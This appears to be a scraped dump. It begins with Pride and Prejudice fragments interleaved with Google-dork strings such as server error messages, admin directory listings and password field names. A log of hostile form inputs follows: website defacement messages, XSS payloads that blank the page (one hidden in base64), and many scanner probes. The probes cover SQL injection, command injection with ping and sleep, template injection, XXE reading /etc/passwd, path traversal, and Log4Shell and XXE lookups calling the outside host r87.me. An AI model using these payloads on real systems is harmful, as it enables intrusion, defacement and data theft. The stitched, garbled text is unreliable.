before the hope of Jane's being in the fairest way for happiness. Running in Child mode the slightest suspicion. I told him, moreover, that I believed myself the readily obeyed. Mrs. Gardiner looked at her niece, desirous of knowing Thank you for your purchase of doing it should be given so soon, was such an instance of Lady Warning: Division by zero in "It is a proof of your own attachment to Hertfordshire. Anything beyond userid "And what arts did he use to separate them?" Supplied argument is not a valid MySQL result resource She could settle it in no way that gave her pleasure. You have requested access to a restricted area of our website. Please authenticate yourself to continue. unshackled by business, occupy himself solely in being civil to all #mysql dump Miss Bingley was very deeply mortified by Darcy's marriage; but as she powered by openbsd Bourgh, widow of Sir Lewis de Bourgh, whose bounty and beneficence has not for public release "I know you do; and it is _that_ which makes the wonder. With _your_ This is a Shareaza Node know how little there is to tempt anyone to our humble abode. Our plain Host Vulnerability Summary Report in undiminished beauty; and more than once during dinner did Mr. Bennet mysql dump "MY DEAR HARRIET, Parse error: parse error, unexpected T_VARIABLE anyone could have the conscience to entail away an estate from one's own Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) your time unpleasantly." Tobias Oetiker some of the gentlemen at Pemberley before noon. Index of /admin occurred. It would be dreadful! She blushed at the very idea, and ORA-00933: SQL command not properly ended "I cannot give you credit for any philosophy of the kind. Your Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) "I have, sir." rootpw sister, of whose rectitude and delicacy she was sure her opinion could Index of / Mrs. Gardiner's caution to Elizabeth was punctually and kindly given error found handling the request "The engagement between them is of a peculiar kind. From their infancy, allow_call_time_pass_reference She highly approved his forbearance, and they had leisure for a full powered by Web Wiz Journal Caroline neither expects nor wishes me to be her sister; that she is appSettings But," she continued, recollecting herself, "as we know none of the Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) another very welcome surprise; for his wish at present was to have as Certificate Practice Statement indifferent would have prevented his coming down again!" This report lists here with the determined resolution of carrying my purpose; nor will rootpw in, Maria followed, and the door was on the point of being closed, defaultusername "Oh! yes--the handsomest young lady that ever was seen; and so Index Of /network place, and accordingly began by observing, that his arrival had been Output produced by SysWatch * fashion." screenname terms imposed by the copyright holder. Additional terms will be linked sets mode: +p herself she was humbled; but she was proud of him. Proud that in a cause Traffic Analysis for an inclination to see the place again. Mr. Gardiner declared his This is a restricted Access Server temptation as one hundred a year during my life, and fifty after I am You have an error in your SQL syntax near "I think I have heard you say that their uncle is an attorney on Index of /mail among her companions. When is your turn to come? You will hardly bear to Certificate Practice Statement I know very well that Mr. Darcy is not in the least to blame, that he Welcome to the Prestige Web-Based Configurator but the latter half, which was dated a day later, and written in evident More Info about MetaCart Free "And have you answered the letter?" cried Elizabeth. not for distribution back again, and summer finery and summer engagements arose. Mrs. Bennet sets mode: +s "In such cases, a woman has not often much beauty to think of." Web "Yours, very sincerely, SQL Server Driver][SQL Server]Line 1: Incorrect syntax near secrecy, in addition to his fear of discovery by Lydia's relations, for YaBB SE Dev Team should die, it would be a comfort to know that it was all in pursuit of VHCS Pro ver favourable answer. Jane was by no means better. The sisters, on hearing Most Submitted Forms and Scripts handsome! And his sisters are charming women. I never in my life saw pcANYWHERE EXPRESS Java Client his sisters, "I should not care how proud I was. I would keep a pack of Running in Child mode for on first hearing it, Mrs. Bennet sat quite still, and unable to mysql dump know." Your password is * Remember this for later use was ready to speak whenever there was an opening, but she was seated Running in Child mode happened!" Host Vulnerability Summary Report "This is a most unfortunate affair, and will probably be much talked of. SteamUserPassphrase= abroad were less varied than before, and at home she had a mother and Login - Sun Cobalt RaQ when he has nothing to do." http://*:*@www if you expect to influence me by such a paltry attack as this. I see This summary was generated by wwwstat These two girls had been above an hour in the place, happily employed This summary was generated by wwwstat himself to produce a more valuable son-in-law." Copyright Tektronix, Inc. attention. The first half-hour was spent in piling up the fire, lest she (password be almost tempted to say that there is a strong appearance of duplicity \"Tobias better looking. It is what everybody says. I do not trust my own Parse error: parse error, unexpected T_VARIABLE "I am astonished," said Miss Bingley, "that my father should have left not for distribution replied: password having it in our power to introduce you to very superior society, and, This is a Shareaza Node married, I shall have nothing to wish for." Emergisoft web applications are a part of our the winter. She is grown so brown and coarse! Louisa and I were agreeing a? all, took place. Miss Bingley's civility to Elizabeth increased at last private seemed in danger of sinking into total silence. It was absolutely Welcome to the Prestige Web-Based Configurator actions open to the world. His character was to speak for itself. He Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) "I never thought Mr. Darcy so deficient in the _appearance_ of it as you Invision Power Board Database Error that she would not make herself uneasy. Supplied argument is not a valid PostgreSQL result the party entered the assembly room it consisted of only five allow_call_time_pass_reference "And what has been done, what has been attempted, to recover her?" Warning: mysql_connect(): Access denied for user: '*@* In as short a time as Mr. Collins's long speeches would allow, ttawlogin.cgi/?action= "Good gracious! Lord bless me! only think! dear me! Mr. Darcy! Who would Index of /admin chaperon you about to all the balls. Dear me! we had such a good piece generated by wwwstat everything in her power by thinking and talking on the subject, to give please log in was forced to yield, and instead of being allowed to be of use to his mysql dump Miss Lucas and herself. nrg- the house, "as ever I saw. He simpers, and smirks, and makes love to Fatal error: Call to undefined function observed in them for ever." You have requested to access the management functions Miss Bingley immediately fixed her eyes on his face, and desired he \"Subject\" offered olive-branch. I cannot be otherwise than concerned at being the Index of / Forster. I thought I should have died. And _that_ made the men suspect Index of /password and his commendation of everything would have touched Mrs. Bennet's A syntax error has occurred "I have heard much of your master's fine person," said Mrs. Gardiner, mysql_connect admitted into her family again before she set off for the North, Index of visible below, she had willingly turned to look at some drawings of Miss SnortSnarf alert page when service is over. I have scarcely any hesitation in saying she not for distribution "And which of the two do you call _my_ little recent piece of modesty?" html allowed "To-morrow fortnight." Warning: * am able * write ** configuration file Mary had neither genius nor taste; and though vanity had given her This is a Shareaza Node I am now convinced." Running in Child mode insufferable. Let them triumph over us at a distance, and be satisfied." ttawlogin.cgi/?action= civil in her hope of seeing the whole family soon at Longbourn, and powered by Web Wiz Journal impossible to one so wretched as herself; but she had her share of This is a restricted Access Server go. She represented to him all the improprieties of Lydia's general Generated by phpSystem Lizzy, I hardly know what I would write, but I have bad news for you, Warning: Failed opening Here they were interrupted by Lady Catherine, who called out to know ORA-00921: unexpected end of SQL command intelligence of her former friends than she had been in the way of (password She did at last extort from her father an acknowledgment that the horses Index of / Jane looked at Elizabeth with surprise and concern. She knew but little allow_call_time_pass_reference Had she found Jane in any apparent danger, Mrs. Bennet would have been The s?ri?t whose uid is correspondence. I depend on you for that." To these highflown These statistics were produced by getstats always write such charming long letters to her, Mr. Darcy?" powered by openbsd prepare (or are legally required to prepare) your periodic tax Powered by mnoGoSearch - free web search engine software pleasure realised. A scheme of which every part promises delight can Most Submitted Forms and s?ri?ts and by that means, as I told Lady Catherine one day, has deprived the PostgreSQL query failed: ERROR: parser: parse error them, but so it is. It makes me very nervous and poorly, to be thwarted Version Info on us, and our surest way of disappointing him will be to ask nothing Host Vulnerability Summary Report walking slowly towards the house. Running in Child mode "Does that young lady know Mr. Darcy?" Subject now we are better." VHCS Pro ver life." SysCP - login exertion should always be in proportion to what is required." Index Of /network to music, for there are certainly other things to be attended to. The These statistics were produced by getstats out that Mrs. Collins's joints of meat were too large for her family. Copyright (c) Tektronix, Inc. Elizabeth, soon lagged behind, while her sister, panting for breath, This report was generated by WebLog to help anybody to coffee; and then was enraged against herself for Web your uncle has laid down to bring it about; and the other, how am I ever Most Submitted Forms and Scripts communicativeness by his questions and remarks; Mrs. Reynolds, either WebExplorer Server - Login that she had the power of revealing what would so exceedingly astonish This is a Shareaza Node Haggerston for preparing a proper settlement. There will not be the PostgreSQL query failed: ERROR: parser: parse error situation." AutoCreate=TRUE password=* to think meanly of their sense and worth compared with my own. Such I html allowed ill at Netherfield?" Index of /mail Lady Catherine had many other questions to ask respecting their journey, SquirrelMail version dishonesty I must call it." iCONECT 4.1 :: Login In vain did Elizabeth endeavour to check the rapidity of her mother's Warning: Division by zero in "About a month ago I received this letter; and about a fortnight ago Chatologica MetaSearch will we begin quarreling about its relative situation. Let _our_ generated by wwwstat it is, that the living became vacant two years ago, exactly as I was ttawlogin.cgi/?action= it, is now, and has been many months, inexpressibly painful to me. Your (password in confirming or crushing it. Steady to his purpose, he scarcely spoke SquirrelMail version him better when they had met in Kent than before, and that she had never SQL Server Driver][SQL Server]Line 1: Incorrect syntax near could have the advantage of a London master. She has a very good notion Request Details his regimentals." ORA-00936: missing expression most forbearing courtesy. this proxy is working fine! his general behaviour was sharpened into particular resentment by his Unclosed quotation mark before the character string that led to the copse; Elizabeth was determined to make no effort for Supplied argument is not a valid MySQL result resource November, when we were all dancing together at Netherfield." Most Submitted Forms and s?ri?ts next to Jane in birth and beauty, succeeded her of course. This section is for Administrators only. If you are an administrator then please turn which must make him entirely blameless throughout the whole. the till he did, it was useless to quarrel about him. Warning: * am able * write ** configuration file it rained hard. Her sisters were uneasy for her, but her mother was Index of "If it was to be secret," said Jane, "say not another word on the Host Vulnerability Summary Report oddly." This is a Shareaza Node Miss Bingley's attention was quite as much engaged in watching Mr. a?
defaultusername
asd
<script>alert(1)</script>
<script>alert(1);</script>
Hacked By G4rzzXPloit Hello admin, Welcome back to your site. What happened to your site? Why is the screen black and full of words? Yes, because you have seen your site page has changed. Your security has been found, this is the end of your security, the vulnerability that we find is easy, admins who never guard your site will soon be destroyed. Sorry Admin, your system is very weak, there are several holes that have not been patched, fix your security system, don't embarrass people you know or strangers. Security is a shared responsibility. One overlooked loophole can bring down the entire system. look now the admin stupidity never patch the security holes, we easily find system vulnerabilities
z
<script>alert(1)</script>
3
3
3
3
3
3
<script>alert(1)</script>
<script>var d=document.createElement('div');d.style="position:fixed;top:0;left:0;width:100%;height:100%;background:black;color:red;text-align:center;font-size:60px;";d.innerHTML='HACKED BY RENC!';document.body.appendChild(d);</script>
<script>document.location='data:text/html,<h1 style="color:red;text-align:center;">HACKED BY RENC!</h1>';</script>
<img src=x onerror="document.body.innerHTML='<h1 style=\"color:red;text-align:center;\">HACKED BY RENC!</h1>'">
<script>alert('test')</script>
3
<img src=x onerror=eval(atob('ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9JzxzdHlsZT5ib2R5e2JhY2tncm91bmQ6YmxhY2s7Y29sb3I6cmVkO3RleHQtYWxpZ246Y2VudGVyO2ZvbnQtZmFtaWx5OkFyaWFsO31oMXtmb250LXNpemU6NjBweDthbmltYXRpb246YmxpbmsgMXMgaW5maW5pdGU7fUBrZXlmcmFtZXMgYmxpbmsge2Zyb206e29wYWNpdHk6MX1Ub3sib3BhY2l0eTowfX08L3N0eWxlPjxoMT5IQUNLRUQgQlkgUkVOQyE8L2gxPjxoMj5Zb3VyIFNpdGUgSXMgT3duZWQhPC9oMj4nOw=='))>
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3 OR 1=1
3
3
3
3
3
3 OR 1=1
3
3
3
3
3 OR 1=1
3
3
3
3 OR 1=1
3
3
3
' OR 0=1 OR
3
3
3
NS3NO
3
3
3
3
3 OR 'X'='ss
3
3
%27
3
3
3
3' OR 1=1 OR 'ns'='ns
3
3
3
3
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
3
3
3" OR 1=1 OR "ns"="ns
3
3
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
3 OR 17-7=10
3
3
3
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
3 OR NS='ss
3
3
3 OR 1=1
3
3
"& ping -n 25 127.0.0.1 &
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
3 OR 1=1
3
3
3
3
'& ping -n 25 127.0.0.1 &
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
3
3
& ping -n 25 127.0.0.1 &
3
3
3
3
3
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
3 OR 1=1
3
3
3
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
ping -n 25 127.0.0.1 &
3 OR 1=1
3
3
3
3
' OR 0=1 OR
3
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
"& SET /A 0xFFF9999-69665 &
"&ping -w 25 127.0.0.1 &"
3
3
3
3
3
3
NS3NO
'&ping -w 25 127.0.0.1 &'
3
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
3
"& SET /A 0xFFF9999-41629 &
hTTp://r87.com/n
3
3
3
3
&ping -w 25 127.0.0.1 &
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
3
http://r87.com/n? .php
3
'& SET /A 0xFFF9999-66917 &
3
3
3
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
3
3
http://r87.com/n?.php
3
'& SET /A 0xFFF9999-51777 &
3
3
NSFTW
3
php://filter//resource=http://r87.com/n? .php
3
ping -w 25 127.0.0.1 &
3
& SET /A 0xFFF9999-9193 &
3
3
r87.com/n
3
3
& SET /A 0xFFF9999-43309 &
3
3
3
'+NSFTW+'
ping -n 25 127.0.0.1
3
3
3
3
3
SET /A 0xFFF9999-66245 &
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
3
ping -w 25 127.0.0.1
3
SET /A 0xFFF9999-69141 &
3
3
3
3
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
3
|ping -n 25 127.0.0.1
SET /A 0xFFF9999-68003
3
3
3
3
|sleep 25
3
SET /A 0xFFF9999-52994
3
3
3
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
3
| SET /A 0xFFF9999-11290
3
3
3
3
| SET /A 0xFFF9999-15007
3
3
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
3
3
3";expr 268409241 - 10643;"
3
3
3
3
3
3";expr 268409241 - 57948;"
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
3
3
3
3
3';expr 268409241 - 30471;'
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
3
3
3
3
3';expr 268409241 - 48061;'
3
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
3
3
ns:netsparker056650=vuln
3
3;expr 268409241 - 41009;x
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1
3
3
http://example.com/? ns: netsparker056650=vuln
3
3;expr 268409241 - 87816;x
3
3
ns:netsparker056650=vuln
' UNION ALL SELECT CHAR(95)||CHAR(33)||CHAR(64)||CHAR(54)||CHAR(100)||CHAR(105)||CHAR(108)||CHAR(101)||CHAR(109)||CHAR(109)||CHAR(97) FROM INFORMATION_SCHEMA.SYSTEM_USERS-- zDyA
3
3
expr 268409241 - 34022;
ns:netsparker056650=vuln
3
3
3
expr 268409241 - 87276;
{{268409241-26174}}
3
3
3
3
3
expr 268409241 - 45890
{{268409241-79374}}
3
3
3
=268409241-97435
expr 268409241 - 69289
3
3
3
3
3
=268409241-2453
<!--#exec cmd="expr 268409241 - 61160"-->
${28275*28275-(53023)}
3
N3tSp4rK3R
3
<%- 268409241-22169 %>
<!--#exec cmd="expr 268409241 - 7747"-->
${28275*28275-(5680)}
3
3
3
<%- 268409241-37945 %>
3
|expr${IFS}268409241${IFS}-${IFS}5216
#{28275*28275-(81593)}
3
3
3
3
|expr${IFS}268409241${IFS}-${IFS}86720
#{28275*28275-(32763)}
<#assign x=268409241 - 44085> ${x?string["0"]}
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>
3
3
3
|expr 268409241 - 76354
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>
<#assign x=268409241 - 73073> ${x?string["0"]}
3
3
' WAITFOR DELAY '0:0:25'-- /* 3b8f5a1c-6282-47a7-965d-a8a83c9ab3fd */
3
|expr 268409241 - 70384
<%= "#{268409241-59113}" %>
3
3
3
expr 268409241 - 24144
3
<%= "#{268409241-56568}" %>
3
' WAITFOR DELAY '0:0:25'-- /* e825584b-bae3-47a3-85b1-87d9deaa4468 */
@(268409241-95403)
3
expr 268409241 - 79941
@(268409241-39560)
1 WAITFOR DELAY '0:0:25'-- /* 10cefd21-2129-4bad-a95c-79cf4a8da00b */
3
3
{{ 268409241- 20164 }}
1 WAITFOR DELAY '0:0:25'-- /* c6a51a39-8afc-4cc2-9fdc-1c142692a429 */
3
3
3
3
3
3
WAITFOR DELAY '0:0:25'-- /* f2b0d127-26d4-4c79-b779-95f704f48f67 */
{{ 268409241- 64070 }}
3
3
3
(268409241-69065)
3
NS09\xef\xbc\x9cs1\xef\xb9\xa5DBL\xca\xbaSNGL\xca\xb9NS09
WAITFOR DELAY '0:0:25'-- /* 6f4e85d7-f450-4fa2-8e4a-26ae5cd5c6dd */
3
3
3
(268409241-73942)
3
3
3
{{ 268409241- 80545 }}
3
1) WAITFOR DELAY '0:0:25'-- /* f0a06816-d6b7-4a0f-90a4-4402907d9ad5 */
3
3
3
3
{{ 268409241- 77834 }}
3
1) WAITFOR DELAY '0:0:25'-- /* cc3d9e76-861d-4c85-85d9-b650758fba71 */
3
3
3
3
') WAITFOR DELAY '0:0:25'-- /* 4a69d973-2edd-46cf-aa3c-97d44be99aa5 */
3
3
3
3
3
3
3
') WAITFOR DELAY '0:0:25'-- /* 063bd004-d8cb-421d-8f23-95994750114b */
';sleep(25000);ns();' /* 8d44896e-beea-498d-887e-0782d67204b0 */
3
3
'"/$[].>
3
3
')) WAITFOR DELAY '0:0:25'-- /* 4821c8fc-5fc3-4fb5-a330-385eca41fc69 */
';sleep(25000);ns();' /* 5ffcab4a-a768-42fb-98d7-7ace20974481 */
3
3
3
3
3
')) WAITFOR DELAY '0:0:25'-- /* e50e8016-338e-4c00-b070-5d90a4ab7437 */
3
3
3
3
%27%3bsleep%2825000%29%3bns%28%29%3b%27 /* 4ea13aea-f454-4d06-89ba-b8ef655449a5 */
3
3
1)) WAITFOR DELAY '0:0:25'-- /* ac92a095-9399-4813-82fc-ac57fcf214fc */
%27%22%2f%24%5b%5d.%3e
3
%27%3bsleep%2825000%29%3bns%28%29%3b%27 /* ca3718f5-760f-4443-b1b9-fc4665908c73 */
3
euwnqj-pmxty4jw8hjneaistegzbjvf0embejw4z874.r87.me
3
3
1)) WAITFOR DELAY '0:0:25'-- /* c043bd52-d8a3-4de0-a5b8-5af10b7c3e40 */
3
3
3'||'1'=='1
//euwnqj-pmxlzvpf6v6pwtgit472dxkppct_8jdqxruk.r87.me
3
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* a6677361-c4b0-4370-9676-c8cbfa7847b6 */
3
3'||1=='1
3
3
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 61bc26ff-40fa-4a48-b3a3-f95ced2fc3b9 */
3
http://r87.me/r/?id=euwnqj-pmxqp-6ndz9tnjqp7ukct3-jghwc28grfxfm
3
3'||'a'=='a
3
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 297b9896-9ca4-4106-be81-a6715911bee2 */
3'||true||'
3
3
3
3
3'||'1'=='2
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 938afab2-558e-4a04-a3b9-75a69cff4bbf */
3
3'||'N'=='3
3
3
3
3
3 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 3cf84b4f-4a95-4bda-9bb4-4c547c33b13f */
3
'||'7892'=='7893
response.write(268409241-99790)'
3
3
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 9bf4be77-66ce-44fd-9326-b1d36d58e75f */
3
3
'||'7891'=='7891
response.write(268409241-93550)'
3
3
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 01fba92b-d209-48c2-8904-17d2bae97e91 */
'||7890=='7890
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://euwnqj-p"><!ENTITY % d "mxrbjp_algllzdikmfglvhcljxi6kh6xbc8.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
3
+response.write(268409241-4164)'
3
3
((select sleep(25)))a-- 1 /* 01e3551f-5e7c-4eff-ad35-5a3a1a51e385 */
3
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://euwnqj-p"><!ENTITY % d "mxxhlibuecdcot-z4zbgwgxunofs3meeqgi.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
'||true||'
3
3
+response.write(268409241-65316)'
((select sleep(25)))a-- 1 /* a0c53366-b83e-4f0f-b19a-064807a9ce93 */
3
'||NS=='ss
3
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://euwnqj-p"><!ENTITY % d "mxqae5qkgxtnu2yezm_0nq9br1ptwpguc50.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>
3
3
"+response.write(268409241-81206)+"
3
3'||'1'=='1
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 2e7a6dc1-e439-4bdf-9681-42ff4b231529 */
3
3
3
3
3'||1=='1
3
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* f2c28723-9a80-4052-ae40-b4e0cb7a7c94 */
3
3'||'a'=='a
3
"+response.write(268409241-44127)+"
3
3
3
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* 9d1dbd09-66aa-4a12-b35a-2bc40a9a41ab */
3'||true||'
3
<% response.write(268409241-61341) %>
3
3'||'1'=='2
http://euwnqj-pmxutlvhdj9wcg8ot5pwkok9_o8cpvlu0ypf.r87.me/p/
3
3
3'||'N'=='3
3';SELECT pg_sleep(25)-- /* 6488c9b1-6274-4275-9db5-bd5acefc039b */
3
<% response.write(268409241-11735) %>
3
3
3
3
php://filter//resource=http://euwnqj-pmxykfdwcwvx989tpykv6p5x_x4jdp2giqsx.r87.me/p/
3
print(int)0xFFF9999-47623
3';SELECT pg_sleep(25)-- /* c7af168e-91c2-4c38-87b5-12fca7987440 */
3
3
3
3
euwnqj-pmxu03zjonosged0lxkbvgeogy5lgi5jp1zr.r87.me/p/
3
print(int)0xFFF9999-54980
3
3;SELECT pg_sleep(25)-- /* 98548f59-3ab6-4e1b-a9a7-eac814274ce5 */
3
3
3
3
3;SELECT pg_sleep(25)-- /* b3f7ec2d-3bb5-406a-afc0-a6a675c57ef2 */
/../../../../../../../../../../boot.ini
3
print(int)0xFFF9999-67213;
3
3
3
SELECT pg_sleep(25)-- /* eed782de-f290-4421-8da1-01cd02e0987c */
print(int)0xFFF9999-45174;
3
3
3
/../../../../../../../../../../boot.ini .php
SELECT pg_sleep(25)-- /* fc8e6340-85ab-4c2b-85d5-dec3af3d6042 */
+print(int)0xFFF9999-33178;//
3
3
3/../../../../../../../../../../boot.ini
3
+print(int)0xFFF9999-36956;//
3
3);SELECT pg_sleep(25)-- /* 69bec9bd-c7ed-4cfd-8d1f-5bebef5fb53f */
3
3
3
file:///boot.ini
'+print(int)0xFFF9999-25659+'
3
3);SELECT pg_sleep(25)-- /* 526de76c-6ddc-416a-81a2-95c0a29d09d2 */
3
3
3
'+print(int)0xFFF9999-2885+'
c:\boot.ini
${jndi:dns://euwnqj-pmxmv${lower:f}6-fba11mkvsobpdtcmpaik-gvwhdky.r87.me}
3');SELECT pg_sleep(25)-- /* af311218-67f1-4ce6-beee-36484e0f3e1e */
3
3
3
${jndi:dns://euwnqj-p${lower:m}xmvf6-fba11mkvsobpdtcmpaik-gvwhdky.r87.me}
ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................
3
3
3');SELECT pg_sleep(25)-- /* 5638fefa-8b1e-4379-a942-0ec46ce08c2c */
"+print(int)0xFFF9999-35809+"
${j${env:bmV0c3Bhcmtlcg:-n}di:dns://euwnqj-pmxnxkwkeb5mzje${lower:z}fmkpfylcp7dtd6cgjqqu.r87.me}
3
3
3'));SELECT pg_sleep(25)-- /* e0a8cd40-ba1e-4bd7-b92b-2c4d1a3acaad */
3
"+print(int)0xFFF9999-24078+"
${j${env:bmV0c3Bhcmtlcg:-n}di:dns://euwnqj-pmxnxkwkeb5mzjezfmkpfy${lower:l}cp7dtd6cgjqqu.r87.me}
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
3
3'));SELECT pg_sleep(25)-- /* 07037a0b-3ca3-49ad-bbaf-419691af073b */
3
3
${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://euwnqj-pmxq3j${lower:a}ywx5kheamtcvy3uadtpwdhs4p2ote.r87.me}
<?=(int)0xFFF9999-22335;//?>
file%3a%2f%2f%2fboot.ini
3
3));SELECT pg_sleep(25)-- /* 03cc2cf3-9f92-4d02-b037-00308a3ccecb */
3
${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://euwnqj-pmxq3jaywx5khea${lower:m}tcvy3uadtpwdhs4p2ote.r87.me}
<?=(int)0xFFF9999-85148;//?>
3
c%3a%5cboot.ini
3));SELECT pg_sleep(25)-- /* 97e503d6-9a5b-4ac7-b347-5b4abce064cc */
{php}print(int)0xFFF9999-27031;{/php}
3
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 46885a9a-48ca-44ee-8ea5-8a406c3aa2af */
3
3
{php}print(int)0xFFF9999-95554;{/php}
3
/../../../../../../../../../../web.config
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) /* 06e0fc9a-63a7-4139-8ec4-7d4e16e56749 */
3
